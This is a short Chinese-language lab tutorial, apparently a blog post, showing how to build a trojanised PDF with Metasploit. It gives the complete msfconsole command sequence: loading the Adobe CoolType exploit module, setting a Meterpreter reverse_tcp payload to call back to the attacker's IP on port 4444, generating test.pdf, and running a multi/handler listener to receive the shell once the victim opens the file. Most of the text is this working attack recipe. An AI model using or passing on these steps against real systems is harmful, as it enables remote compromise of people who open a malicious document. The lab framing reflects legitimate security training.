利用metasploit制作pdf木马

    科技2022-07-14  198

    实验环境:kali-linux虚拟机(攻击机)、win7虚拟机(靶机) 实验工具:Vmware、kali-linux的iso

    实验过程:

    一、攻击机端:

    1.查看自己的ip地址:ifconfig

    2.进入metasploit控制台:msfconsole #> msfconsole3.利用PDF文件漏洞(Adobe公司之前发布的一个漏洞): #> use exploit/windows/fileformat/adobe_cooltype_sing 4.配置攻击载荷创建到攻击机的连接 #> set payload windows/meterpreter/reverse_tcp 5.设置攻击机IP地址、端口号 #> set lhost 10.10.4.234 #> set lport 4444 6.生成带有木马的PDF文件 #> set FILENAME test.pdf 7.执行 #> exploit

    二、靶机端:

    1.将带有木马的PDF文件复制到靶机中

    2.查看本机ip地址 3.点击打开PD文件

    三、攻击机端:

    1.在攻击机中打开监听模块:

    #> use multi/handler

    2.查看需要设置的参数:

    #> show options 在攻击机中加载连接负荷 #> set payload windows/meterpreter/reverse_tcp

    4.设置攻击机IP地址、端口号

    #> set lhost 10.10.4.234 #> set lport 4444

    5.运行监听模块

    #> exploit

    6.反弹会话,拿到shell

    Processed: 0.013, SQL: 8